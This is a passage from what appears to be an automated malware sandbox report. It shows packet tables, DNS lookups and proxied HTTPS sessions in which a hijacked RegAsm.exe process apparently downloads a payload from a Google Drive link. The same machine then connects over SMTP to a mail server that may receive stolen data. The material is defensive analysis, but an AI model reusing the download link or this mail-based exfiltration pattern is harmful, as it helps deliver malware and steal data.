                                                        Oct 13, 2021 14:39:36.748982906 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.749044895 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.749125004 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.749205112 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.749351025 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.749362946 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.749388933 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.749604940 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.749630928 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.749772072 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.750168085 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.750304937 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.750315905 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.750338078 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.750590086 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.750622988 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.750813961 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.751069069 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.751219034 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.751233101 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.751261950 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.751348972 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.751364946 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.751400948 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.751631021 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.752043009 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.752213001 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.752239943 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.752274990 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.752357006 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.752373934 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.752417088 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.752603054 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.752981901 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.753156900 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.753166914 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.753199100 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.753328085 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.753361940 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.753556967 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.753801107 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.753978968 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.754010916 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.754132986 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.754168987 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.754195929 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.754311085 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.754368067 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.754853010 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.755007029 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.755042076 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.755156994 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.755182981 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.755203962 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.755357027 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.755390882 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.755522966 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.755554914 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.755757093 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.755906105 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.755947113 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.756091118 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.756119013 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.756233931 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.756263018 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.756284952 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.756380081 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.756432056 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.756454945 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.756586075 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.756613016 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.756711960 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.756736994 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.756763935 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.756882906 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.756899118 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.756913900 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.757101059 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.757128000 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.757244110 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.757261038 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.757278919 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.757422924 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.757433891 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.757456064 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.757560015 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.757586002 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.757606030 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.757796049 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.757817030 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.757962942 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.757985115 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.758111000 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.758178949 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.758203030 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.758269072 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.758327007 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.758339882 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.758356094 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.758498907 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.758532047 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.758553028 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.758650064 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.758789062 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.758810043 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.758830070 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.758950949 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.758971930 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.758986950 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.759150982 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.759166002 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.759181023 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.759321928 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.759349108 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.759354115 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.759366035 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.759536982 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.759577990 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.759607077 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.759718895 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.759737015 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.759752035 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.759912014 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.759916067 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.759942055 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.760068893 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.760096073 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.760102034 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.760116100 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.760257006 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.760277987 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.760298967 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.760533094 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.760591030 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.760613918 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.760662079 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.760720015 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.760760069 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.760777950 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.760898113 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.761014938 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.761040926 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.761095047 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.761178970 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.761203051 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.761220932 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.761354923 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.761363029 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.761383057 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.761518955 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.761545897 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.761569023 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.761723042 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.761761904 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.761784077 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.761871099 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.761980057 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.762041092 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.762063980 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.762140036 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.762211084 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.762233973 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.762247086 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.762424946 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.762435913 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.762458086 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.762581110 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.762604952 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.762733936 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.762820005 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.762845039 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.762939930 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.763048887 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.763099909 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.763120890 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.763191938 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.763273954 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.763293028 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.763439894 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.763506889 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.763533115 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.763587952 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.763685942 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.763709068 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.763818026 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.763885021 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.763907909 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.763973951 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.764065027 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.764089108 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.764189005 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.764236927 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.764257908 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.764334917 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.764425039 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.764447927 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.764578104 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.764605045 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.764611959 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.764624119 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.764730930 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.764820099 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.764843941 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.764875889 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.764983892 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.765036106 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.765079021 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:41:12.877155066 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:41:12.986875057 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:12.987166882 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:41:13.121690989 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:13.122230053 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:41:13.231971979 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:13.490446091 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:13.492100000 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:41:13.601864100 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:13.643901110 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:13.644438028 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:41:13.754185915 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:13.809865952 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:13.810405016 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:41:13.920219898 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:13.957331896 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:13.957720995 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:41:14.107525110 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:14.114407063 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:14.114773035 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:41:14.224885941 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:14.268451929 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:14.270685911 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:41:14.270786047 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:41:14.270801067 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:41:14.270813942 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:41:14.380714893 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:14.380784988 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:14.380816936 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:14.380846977 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:14.546084881 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:41:14.600296021 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:42:52.406965017 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:42:52.516834021 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:42:52.547036886 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:42:52.547401905 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:42:52.552551031 CEST5874982165.60.11.90192.168.11.20
                                                        Oct 13, 2021 14:42:52.552762985 CEST49821587192.168.11.2065.60.11.90
                                                        Oct 13, 2021 14:42:52.657417059 CEST5874982165.60.11.90192.168.11.20

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 13, 2021 14:39:35.652811050 CEST5405953192.168.11.201.1.1.1
                                                        Oct 13, 2021 14:39:35.670572042 CEST53540591.1.1.1192.168.11.20
                                                        Oct 13, 2021 14:39:36.392570972 CEST5743853192.168.11.201.1.1.1
                                                        Oct 13, 2021 14:39:36.426211119 CEST53574381.1.1.1192.168.11.20
                                                        Oct 13, 2021 14:41:12.377988100 CEST5580153192.168.11.201.1.1.1
                                                        Oct 13, 2021 14:41:12.829710960 CEST53558011.1.1.1192.168.11.20

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Oct 13, 2021 14:39:35.652811050 CEST192.168.11.201.1.1.10xaa30Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                        Oct 13, 2021 14:39:36.392570972 CEST192.168.11.201.1.1.10x78c3Standard query (0)doc-0g-4k-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                        Oct 13, 2021 14:41:12.377988100 CEST192.168.11.201.1.1.10x3319Standard query (0)mail.friendsequipment.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Oct 13, 2021 14:39:35.670572042 CEST1.1.1.1192.168.11.200xaa30No error (0)drive.google.com172.217.168.46A (IP address)IN (0x0001)
                                                        Oct 13, 2021 14:39:36.426211119 CEST1.1.1.1192.168.11.200x78c3No error (0)doc-0g-4k-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                        Oct 13, 2021 14:39:36.426211119 CEST1.1.1.1192.168.11.200x78c3No error (0)googlehosted.l.googleusercontent.com142.250.181.225A (IP address)IN (0x0001)
                                                        Oct 13, 2021 14:41:12.829710960 CEST1.1.1.1192.168.11.200x3319No error (0)mail.friendsequipment.comfriendsequipment.comCNAME (Canonical name)IN (0x0001)
                                                        Oct 13, 2021 14:41:12.829710960 CEST1.1.1.1192.168.11.200x3319No error (0)friendsequipment.com65.60.11.90A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • drive.google.com
                                                        • doc-0g-4k-docs.googleusercontent.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.11.2049809172.217.168.46443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2021-10-13 12:39:35 UTC0OUTGET /uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        2021-10-13 12:39:36 UTC0INHTTP/1.1 302 Moved Temporarily
                                                        Content-Type: text/html; charset=UTF-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Wed, 13 Oct 2021 12:39:36 GMT
                                                        Location: https://doc-0g-4k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l5g2k8pionitvg39ebi65v2bf/1634128725000/08714151441044389622/*/1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh?e=download
                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                        Content-Security-Policy: script-src 'nonce-LT3kPM36so/sXEnx6M+Dtw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-XSS-Protection: 1; mode=block
                                                        Server: GSE
                                                        Set-Cookie: NID=511=ZUZLq29QekPjuIwqCSlkuea25LNLLP6XWFeed21fetUlXed_rskr_2ThfEWbf2zF7zga_HMTI-2wMYFqa6uk0XcE9DDlbSR-mjjrXQDyWWOwenFHJ8i-ZjPtg7BUIh1dFrY-9yMKNY_5io3nnEgn29y9U0kKZayV3yuw8STXeSM; expires=Thu, 14-Apr-2022 12:39:35 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                        Accept-Ranges: none
                                                        Vary: Accept-Encoding
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2021-10-13 12:39:36 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 67 2d 34 6b 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 39 34 36 6f
                                                        Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0g-4k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946o
                                                        2021-10-13 12:39:36 UTC1INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.11.2049810142.250.181.225443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2021-10-13 12:39:36 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l5g2k8pionitvg39ebi65v2bf/1634128725000/08714151441044389622/*/1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh?e=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Cache-Control: no-cache
                                                        Host: doc-0g-4k-docs.googleusercontent.com
                                                        Connection: Keep-Alive
                                                        2021-10-13 12:39:36 UTC2INHTTP/1.1 200 OK
                                                        X-GUploader-UploadID: ADPycdtCYH-_MF32y89GxQ-s00LHme-kGf9oyAfg_k7OVMA6OPZJZDZ7knHgxLicwROjd_4QdpROYixuYkSKjyd5fZI
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: false
